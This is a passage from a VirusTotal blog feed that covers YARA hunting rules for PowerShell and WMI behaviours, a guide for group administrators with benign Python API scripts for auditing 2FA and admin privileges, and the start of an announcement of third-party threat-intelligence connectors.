<div class="interval_12">🚀 Check out the <a href="https://github.com/VirusTotal/vt-public-crowdsourced-yara/blob/main/File/PowerShell_BitsTransfer_Execution.yar" target="_blank"> rule </a>on our GitHub </div>
<div class="interval_12"><u><b>WMI Event Subscription</u></b> </div>
<div class="interval_12">For this rule, we split the condition into two blocks. The first one searches for the patterns we used in our VTI query in “processes created”, “terminated” and “commands executed” during detonation. The second block searches for the same strings in a different set of fields, in this case “highlighted calls”, “highlighted text”, and “system property lookups” given WMI execution is also (although, more rarely) stored in these fields, as previously discussed.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/WrPPMSR9hW4oA5qprZVJr2PONX1urr6h-UMY83-rf-aMkYRYXHJ-lPdCYozseJV2lkAk-edNYH4UyGqhQTkqojJreUzVgwMym7zdLMXEYd6aPKEctIYNOlcQ66Y2qe0Eindu_l_URp3vvBPTTjgupRa9mjpA3cpFzVQpz1KwXFgfMJuwr3VFIOEiKqSbBX8" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12">🚀 Check out the <a href="https://github.com/VirusTotal/vt-public-crowdsourced-yara/blob/main/File/WMI_Event_Subscription_Behaviors.yar" target="_blank"> rule </a>on our GitHub </div>
<div class="interval_12"><u><b>PowerShell capabilities</u></b> </div>
<div class="interval_12">This rule, as the previous ones, searches for patterns in “processes created”, “terminated” and “commands executed”. In addition to that, it also searches telemetry generated by sigma rule matches, which is a powerful feature often overlooked. In this case, it will search for Windows XML EventLog EVTX events generated by our sandboxes containing the same pattern we searched for in “behavior”.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/8X6cmFdY90NVF1apIBjJkXYp0FTmY0tCO3Fl3g2ot1vI7quKevVbrMMKmbq259O0f-WRz-5WZAiYtAa5mZigpFJGZfR-WcKWGIq4CgCe6ehyRXTCDxxuDOm-LKtb3SgDiM-aid4X1MwPAviNyYTjeWkoJuuULweD7clZ-PrA5CwR9M103CjRN5-C44DC70Q" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12">🚀 Check out the <a href="https://github.com/VirusTotal/vt-public-crowdsourced-yara/blob/main/File/PowerShell_Binary_Injection.yar" target="_blank"> rule </a>on our GitHub </div>
<h2 style="text-align: left;">Wrapping up</h2>
<div class="interval_12">VT Intelligence queries based on third-party intelligence publications is one of the most usual tasks for CTI teams, allowing a better understanding and calibration of the malicious campaign, threat hunting and monitoring. Queries based on TTPs could be easily generated thanks to all the details resulting from VirusTotal’s sandbox detonation. Once the query is polished and we are happy with the results, it can quickly be converted into a YARA livehunt rule to automate the identification of new samples and monitor the evolution of the given campaign.
</div>
<div class="interval_12">The process illustrated in this blog can be used by any CTI, Threat Hunting, and even Detection Engineering teams, leveraging external low-level tactical information for hunting, better understanding of the campaigns and malware leveraged, threat actor identification, estimate amount of samples, detection and timeline, monitor any campaign’s evolution, extract IOCs for proactive protection and develop rules for internal detection.
</div>
<div class="interval_12">As usual, we are happy to <a href="https://www.virustotal.com/gui/contact-us">hear from you! </a>
</div>
<div class="interval_12">Happy hunting!
</div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
.my-yara-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: #F7F9F9;
color: Black;
/*padding: 24px;*/
border-collapse: collapse;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
mark.dark-blue {
color:Blue;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_10 {
width: 10%;
}
.width_15 {
width: 15%;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_90 {
width: 90%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>
Joseliyo Sánchezhttp://www.blogger.com/profile/15205592295367780978noreply@blogger.comtag:blogger.com,1999:blog-6871606241422173914.post-53109471320037639522023-11-21T11:07:00.006+01:002023-11-21T13:09:46.201+01:00The definitive VirusTotal’s admin guide<div class="interval_12">
<table>
<tbody><tr>
<td>
<img class="central_img width_40" src="https://lh7-us.googleusercontent.com/Uyi_3mh0LJLGF6zmDwNw3aN7LaFNAnlT30_Hnia1zNb4xHkJIcFMIKLjqQ9OcIAOpy5HRrys_9CwmufSMfD6ky4ZuBohT02hpqQuJMf7xaVyVfTm9ojFP-jSlIF-1e49Q9nszA6Qu2sQfvLqpb09Xa7-iArIsYF56vfW4qKJjYjupnUR5nl042g4UGoVH6U" />
</td>
<td class="content">
Check out our <a href="https://docs.virustotal.com/docs/admins-guide" target="_blank"><b>Walkthrough guide for VirusTotal group administrators</b></a>!
</td>
</tr>
</tbody></table>
</div>
<div class="interval_12">
VirusTotal administrators’ tasks are key for the good health of the groups they manage. Unfortunately it is not always clear the best way to do this or that task. But we heard our beloved community, and we created the <a href="https://docs.virustotal.com/docs/admins-guide" target="_blank"><b>definitive guide</b></a> for everything a VirusTotal group administrator might need to know, including use cases, examples, where to find everything in the GUI and how to automate tasks using the API, including <a href="https://github.com/VirusTotal/vt-use-cases/tree/main/admins_guide" target="_blank">scripts</a> ready to use in our GitHub repository.
</div>
<div class="central_img width_100 interval_12">
<a href="https://docs.virustotal.com/docs/admins-guide" target="_blank">
<img src="https://lh7-us.googleusercontent.com/LmUk_gsu_tYXXjSi_ihBSC6X2P5EnTjTsMsQp_XGG1eA3JCPgcNAL1IVpSarZb3q54pSmx7FaLYyhtzBnf-Yy2fVgwS4GKCKRQ3Jc_TCPucRr38VatCOu-1Tl5VPzOGP6mxmakHGPX_Y2XTT6nJDp4sphQTVyA5LXIGmZx5VfF6xEApWxVam48Kjocd8vrA" /> </a>
</div>
<br />
<h2 style="text-align: left;">Introducing the walkthrough guide for VirusTotal group admins</h2>
<h3 style="text-align: left;">General notions</h3>
<div class="interval_12">
The guide begins with general notions and a quick overview of the <b>VT Enterprise group</b> web interface.
</div>
<div class="central_img width_80 interval_12">
<img src="https://lh7-us.googleusercontent.com/-51re0kovFJptycvukEP6f4E0mA_tH15mF-fQJUh0AHiPtk1gff3NpMCkhMkNpnGatfpb_4O3d5GnVpEe46XKYgJ0HOm0kiGjVAtNxakdfIw7h3biNZL4dxLyNA14rZPR7reffej_epIWC_2WZqlF5HUdznILfWlsVDOrjsEBAoOzT65BpMxyS_Pf0CtATA" />
</div>
<br />
<div class="interval_12">
In particular, we need to know where to retrieve IDs for <b>groups</b>, <b>users</b> and <b>service accounts</b>, as they are required for any VirusTotal API v3 interaction. The <b>administrator’s API key</b> is required for VirusTotal API authentication/authorization.
</div>
<div class="interval_12">
<ul>
<li><b>Group ID</b>: on the <b>VT Enterprise group</b> portal, the <b>GROUP PREFERENCES</b> section shows your <b>Group ID</b>.</li>
<li><b>User ID</b>: on the <b>VT Enterprise group</b> portal, the <b>Group members</b> section lists the group's users. By clicking on any of them, you automatically pivot to <b>USER PROFILE</b> where the user's ID is shown near the user's avatar.</li>
<li><b>Service account ID</b>: on the <b>VT Enterprise group</b> portal, the <b>Service accounts</b> section lists the group’s service accounts by their IDs.</li>
<li><b>VirusTotal user API key</b>: there are 2 ways of getting your API key from the <a href="https://www.virustotal.com/gui/home/search" target="_blank">landing page</a> as in the below image.</li>
</ul>
</div>
<div class="central_img width_80 interval_12">
<img src="https://lh7-us.googleusercontent.com/-0e6PjCaavu74XWregwa0eQ0u4yCw1Fx1XAqS1PKJyeDh7pynLRNGcDbHmABGOGDNZhAn5fOH6kkOSYIgWC8zd3Eg63pZaxewp9XTBNeeMg2HpaRbnOzAxaiIPOyMSlF32npNIofqq2rfatya41UfPvr2dnxRuSzHthWuVRoRfqaprIRNybc0Q2cOf8aWgM" />
</div>
<br />
<h3 style="text-align: left;">Use cases</h3>
<div class="interval_12">
The second part of the guide describes every action a VirusTotal admin can perform, splitted by sections for easier reference:
</div>
<ul>
<li><b>Group members management</b>
<div>In this section you will find how to manage users and service accounts by adding or removing them to/from the group, how to download a list of members and how to manage users privileges.</div>
</li>
<li><b>Group management</b>
<div>This section focuses on group-level configurations that may also affect users, such as active session timings and Single Sign On (SSO) security features.</div>
</li>
<li><b>Consumption</b>
<div>At this section you will find information about one of the most requested topics, which is quota and consumption.</div>
</li>
</ul>
<div class="interval_12">
Each use case has a descriptive title to easily identify what you are looking for, the <b>Web interface</b> section describing use cases in the GUI, and details on <b>VirusTotal API</b> v3 endpoints that can be used to automate the use case, including <b>API examples</b> linking to our GitHub repository for most cases.
</div>
<br />
<h4 style="text-align: left;">Enforcing security - 2FA</h4>
<div class="interval_12">
As an example, and focusing on a security perspective, let’s say that we want to obtain all users in our group without 2FA enabled.
In the <b>VT Enterprise group</b> web interface you will find the <b>USERS</b> tab, and under the <b>Group members</b> section there is a <b>Filter by</b> dropdown with the <b>View only users without 2FA</b> option:
</div>
<div class="central_img width_40 interval_12">
<img src="https://lh7-us.googleusercontent.com/7oum7QNYjbr4Kk_uPyAvYZEEWtpL9iywRz7ZU_mN7SqUp5Sp-18mVvAFp1Ufs3-SUNuT9-K5Vlw8ky19YVKo5PUv4jR_X9qxrC8K-iO7tsLoXG4NlPyj98U87gLEFD25K9uSUKEF4AsMGGD-RpqFBcMiaD4rsmvDoeZTvGhWAVnRaP8qq4_iFzeqtbb64PQ" />
</div>
<div class="interval_12">
The same can be automated with the API with a simple script.
</div>
<div class="my-code interval_12">
<mark class="gray">"""</mark><br />
<mark class="gray">**DISCLAIMER:**</mark><br />
<mark class="gray">Please note that this code is for educational purposes only.</mark><br />
<mark class="gray">It is not intended to be run directly in production.</mark><br />
<mark class="gray">This is provided on a best effort basis.</mark><br />
<mark class="gray">Please make sure the code you run does what you expect it to do.</mark><br />
<mark class="gray">"""</mark><br />
<mark class="orange">import</mark> requests <br /><br />
<mark class="orange">def</mark> <mark class="yellow">get_users_without_2fa</mark>(apikey, group_id):<br />
<mark class="gray">"""</mark><br />
<mark class="gray">Getting users objects related to a group by group ID, filtering by 2fa_enabled = false.</mark><br />
<mark class="gray">Requested users attributes: first_name,last_name,email.</mark><br />
<mark class="gray">VT API endpoint reference: https://developers.virustotal.com/reference/groups-relationships</mark><br />
<mark class="gray">"""</mark><br />
users = []<br />
url = <mark class="green">f"https://www.virustotal.com/api/v3/groups/{group_id}/users?attributes=first_name,last_name,email&filter=2fa_enabled:false"</mark><br />
headers = {<mark class="green">"accept"</mark>: <mark class="green">"application/json"</mark>, <mark class="green">"x-apikey"</mark>: apikey}<br />
<mark class="orange">while</mark> url:<br />
res = requests.get(url, headers=headers)<br />
res.raise_for_status()<br />
res = res.json()<br />
<mark class="orange">for</mark> el <mark class="orange">in</mark> res[<mark class="green">"data"</mark>]:<br />
users.append(<br />
<mark class="green">f"username:{el['id']},"</mark><br />
<mark class="green">f"first_name:{el['attributes'].get('first_name','')},"</mark><br />
<mark class="green">f"last_name:{el['attributes'].get('last_name','')},"</mark><br />
<mark class="green">f"email:{el['attributes'].get('email','')}"</mark><br />
)<br />
url = res.get(<mark class="green">"links"</mark>, {}).get(<mark class="green">"next"</mark>, <mark class="orange">None</mark>)<br />
<mark class="orange">return</mark> users
</div>
<div class="interval_12">
For this we used the <a href="https://developers.virustotal.com/reference/groups-relationships" target="_blank">/v3/groups/{group_id}/{relationship}</a> endpoint, which refers to ‘users’ relationship, filtering by “2fa_enabled” as “false” and requesting “first_name”, “last_name” and “email” attributes for each of them.
Check it out on our <a href="https://github.com/VirusTotal/vt-use-cases/blob/main/admins_guide/getting_users_without_2fa.py" target="_blank">GitHub repository</a>!
</div>
<br />
<h4 style="text-align: left;">Enforcing security - privileges are granted where required</h4>
<div class="interval_12">
It is very important to monitor that admin privileges are only granted to users who require them to perform their jobs. Tracking admin privileges on a regular basis is a very healthy task.
</div>
<div class="interval_12">
When using the VirusTotal web portal, the only difference to the previous example is the filter to be applied, which in this case is <b>View only admin users</b>.
</div>
<div class="central_img width_40 interval_12">
<img src="https://lh7-us.googleusercontent.com/itwkSa2uJHD3xTbhhQb95jeS9-5Vwnw4j_FlfjRnZ6CEODUb6tT5-gGp2oUb_NhojG_0b6f2b7QiLjlksP61RGTsxpGxuVOTD8VzOXi7zYjIdLRlasVlv0L1lri8sB3ZZ7EIOXViBE3H_5rcF-uzUR2JESSOYz7sg61gF09SdrA9GWD9JOzfjOkudWzx4nU" />
</div>
<div class="interval_12">
This task can be automated. The following Python script compares the users with admin privileges against a given list of administrators and reports any anomalies:
</div>
<div class="my-code interval_12">
<mark class="gray">"""</mark><br />
<mark class="gray">**DISCLAIMER:**</mark><br />
<mark class="gray">Please note that this code is for educational purposes only.</mark><br />
<mark class="gray">It is not intended to be run directly in production.</mark><br />
<mark class="gray">This is provided on a best effort basis.</mark><br />
<mark class="gray">Please make sure the code you run does what you expect it to do.</mark><br />
<mark class="gray">"""</mark><br />
<mark class="orange">import</mark> requests <br /><br />
<mark class="orange">def</mark> <mark class="yellow">get_possible_unauthorized_admins</mark>(apikey, group_id, authorized_admins):<br />
<mark class="gray">"""</mark><br />
<mark class="gray">Getting users objects (administrators) related to a group by group ID.</mark><br />
<mark class="gray">Requested users attributes: first_name,last_name,email.</mark><br />
<mark class="gray">VT API endpoint reference: https://docs.virustotal.com/reference/get-group-administrators</mark><br />
<mark class="gray">"""</mark><br />
unauthorized_admins = []<br />
url = <mark class="green">f"https://www.virustotal.com/api/v3/groups/{group_id}/administrators?attributes=first_name,last_name,email"</mark><br />
headers = {<mark class="green">"accept"</mark>: <mark class="green">"application/json"</mark>, <mark class="green">"x-apikey"</mark>: apikey}<br />
<mark class="orange">while</mark> url:<br />
res = requests.get(url, headers=headers)<br />
res.raise_for_status()<br />
res = res.json()<br />
<mark class="orange">for</mark> el <mark class="orange">in</mark> res[<mark class="green">"data"</mark>]:<br />
<mark class="orange">if</mark> el[<mark class="green">"id"</mark>] <mark class="orange">not in</mark> authorized_admins:<br />
unauthorized_admins.append(<br />
<mark class="green">f"username: {el['id']}, "</mark><br />
<mark class="green">f"first_name: {el['attributes'].get('first_name', '')}, "</mark><br />
<mark class="green">f"last_name: {el['attributes'].get('last_name', '')}, "</mark><br />
<mark class="green">f"email: {el['attributes'].get('email', '')}"</mark><br />
)<br />
url = res.get(<mark class="green">"links"</mark>, {}).get(<mark class="green">"next"</mark>, <mark class="orange">None</mark>)<br />
<mark class="orange">return</mark> unauthorized_admins
</div>
<div class="interval_12">
For this we have used <a href="https://developers.virustotal.com/reference/groups-relationships" target="_blank">/v3/groups/{group_id}/administrators</a> endpoint referring to ‘administrators’ relationship where requested “first_name”, “last_name” and “email” attributes for each of them. Additionally, the ‘authorized_admins’ list is used to filter out authorized admins.
Check it out on our <a href="https://github.com/VirusTotal/vt-use-cases/blob/main/admins_guide/getting_possible_unauthorized_admins.py" target="_blank">GitHub repository</a>!
</div>
<br />
<h2 style="text-align: left;">Wrapping up</h2>
<div class="interval_12">
With these new resources, we aim to assist VirusTotal group administrators in their day-to-day duties. The documentation is extensive enough to cover everything they can do on the web interface and provides ways of automation to get the same data as from the web portal, but through raw Python scripts when possible.
</div>
<div class="interval_12">
We hope you find this as useful as we do. If you have any questions, feedback or new use cases we can assist you with, please do not hesitate to <a href="https://www.virustotal.com/gui/contact-us/other" target="_blank">contact us</a>.
</div>
<div class="interval_12">
Happy management!
</div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_15 {
width: 15%;
}
.width_20 {
width: 20%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>Alexandra Martinhttp://www.blogger.com/profile/08447900589635774086noreply@blogger.comtag:blogger.com,1999:blog-6871606241422173914.post-11831192077746041022023-10-26T15:59:00.001+02:002023-10-26T16:08:22.086+02:00Unifying threat context with VirusTotal connectors<div style="text-align: left;">
<span style="font-size: 11pt; white-space-collapse: preserve;">In an age where cyber threats continue to grow in
sophistication and
frequency, the pursuit of a unified threat contextualization platform is no
longer a mere convenience but an absolute necessity. When faced with an
unfamiliar file, hash, domain, IP address, or URL, having a singular view of
threat intelligence not only expedites investigations but also helps
eliminate detection blind spots.</span>
</div>
<div style="text-align: left;">
<div style="text-align: center;"><img alt="Connectors list" border="0" data-original-height="2100" data-original-width="2996" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj06c_its8jTw1jPbj0I1VuAIOgDA5NbzsO_3wV8GZaAaLeJevE0Ps9xT0lZ_XdnV1aAPDAQEb5KStmFBFOygdyHSw58KDHOtAMSRq2dTbOjmjCWO4go1DUBVeafS8ZgHAGdnsAJeTzPXIP62UdNi9C7YwHVRss9-diokVfMH4x8D0G5uQWyQuEBmsD4Sf9/s16000/Screenshot%202023-10-24%20at%2015.25.56.png" style="width: 100%;" /></div><div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-size: 11pt; white-space-collapse: preserve;"></span>
</div>
<div style="text-align: left;">
<span style="font-size: 11pt; white-space-collapse: preserve;">Today, we are taking a significant step toward realizing
this unified
threat contextualization with VirusTotal Connectors. That's right. All your
Threat Intel intelligence from third parties will seamlessly be merged with
VirusTotal's context!</span>
</div>
<div style="text-align: left;">
<span style="font-size: 11pt; white-space-collapse: preserve;"><br /></span>
</div>
<span id="docs-internal-guid-d8024a68-7fff-6f01-936f-1a23db0101bf">
<h4 style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><b>Complementary threat context</b></span>
</h4>
<div>
<span face="Arial, sans-serif" style="font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">
<p dir="ltr" style="font-size: 11pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; white-space-collapse: preserve;">
<span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">While this post doesn't delve into specific third-party connectors,
we're excited to announce that Mandiant is among our first supported
connectors. More details about this will be covered in an upcoming
blog post.</span>
</p>
<p dir="ltr" style="font-size: 11pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; white-space-collapse: preserve;">
<span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">In addition to Mandiant, we are introducing two other connectors,
each offering distinct context for different use cases, provided by
leading security providers:</span>
</p>
<ul style="font-size: 11pt; margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px; text-align: left; white-space-collapse: preserve;">
<li aria-level="1" style="background-color: transparent; color: black; font-family: Arial, sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;">
<p role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span face="Arial, sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b>Mandiant Intelligence</b></span><span face="Arial, sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">
-</span><span face="Arial, sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">
This connector allows you to incorporate Mandiant's malware
toolkit, campaign insights, and threat actor attributions into
VirusTotal. </span><a href="https://developers.virustotal.com/docs/docs-mandiant-connector" style="font-weight: 400; text-decoration: none;"><span face="Arial,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">Learn more</span></a><span face="Arial, sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.</span>
</p>
</li>
<li aria-level="1" style="background-color: transparent; color: black; font-family: Arial, sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;">
<p role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span face="Arial, sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b>MISP</b></span><span face="Arial, sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">
-</span><span face="Arial, sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">
Enhance VirusTotal indicator of compromise reports with
information from MISP events, including descriptions, tags, and
other pertinent data generated by your Cyber Threat Intelligence
(CTI) team and trusted circles. </span><a href="https://developers.virustotal.com/docs/docs-misp-connector" style="font-weight: 400; text-decoration: none;"><span face="Arial,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">Learn more</span></a><span face="Arial, sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.</span>
</p>
</li>
<li>
<span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span id="docs-internal-guid-a6d6be84-7fff-360a-7564-20a102d2ef6b"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><b>Splunk</b></span><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-weight: 700; vertical-align: baseline;">
-</span><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">
Gain immediate insight into whether a specific VirusTotal IoC
has been detected in your environment, either presently or in
the past. </span><a href="https://developers.virustotal.com/docs/docs-splunk-connector" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">Learn more</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">.</span></span></span>
</li>
</ul>
<div>
<span id="docs-internal-guid-0df913cd-7fff-78a6-e215-de76e44216d5">
<h4 style="font-size: 11pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left; white-space-collapse: preserve;">
<b style="font-size: 11pt;">Configuration made easy</b>
</h4>
<div style="font-size: 11pt; white-space-collapse: preserve;">
<span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span id="docs-internal-guid-6c951c64-7fff-b92f-50f4-208624b89910"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">Configuring VirusTotal connectors is a breeze. You can access
the configuration settings in the </span><a href="https://www.virustotal.com/gui/technology-integrations/third-party-to-vt" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">“Technology Integrations” section, under the “Connectors”
tab</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">. This is also accessible via the left navbar menu in
VirusTotal Enterprise or the top navbar in its landing, under
the Intelligence entry.</span></span></span>
</div>
<div>
<span style="font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span>
<div class="separator" style="clear: both; font-size: 11pt; text-align: center; white-space-collapse: preserve;">
<img border="0" data-original-height="2084" data-original-width="2944" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxuLR_29ZEB9YCXRQO_5AQAgsfXzYJQhNpkdjrYcrh2ERYt4H2s8O9yh2XbDMI7aUWWbZSk2ONatQsGFk-hUmblilDyNkDboDJ2DRzXykcIx4tIu5XXkMzfLtWsr6fKUCd38Kzosak5UIk9cED6oww9n7eaoA3BlRmiAE6hrPmQzDjJoWty77loACTsY8X/s16000/Screenshot%202023-10-24%20at%2017.15.23.png" />
</div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: 14.6667px; white-space-collapse: preserve;">In a nutshell, all you need to do
is configure API
authentication for the corresponding intelligence provider
(bring your own license), and VirusTotal will automatically
retrieve any context that such a third-party provider may
have on any indicator you query in VirusTotal. This
contextual information will then be seamlessly integrated
into VirusTotal IoC reports, becoming the first section in
the Detection tab and it will be available only for you and
your group. At this time the connector's information will
not be available via API. For additional guidance, please
refer to our documentation.</span>
</div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: 14.6667px; white-space-collapse: preserve;"><br /></span>
</div>
<span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"><span id="docs-internal-guid-788e672d-7fff-370d-da8e-12959d8c9599"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">
<h4 style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">
<div>
<b style="font-size: 11pt;">Community development</b>
</div>
</span>
</h4>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">Our journey doesn't stop here. We're
already in the process of supporting more
data providers. At VirusTotal, we firmly
believe in the power of community
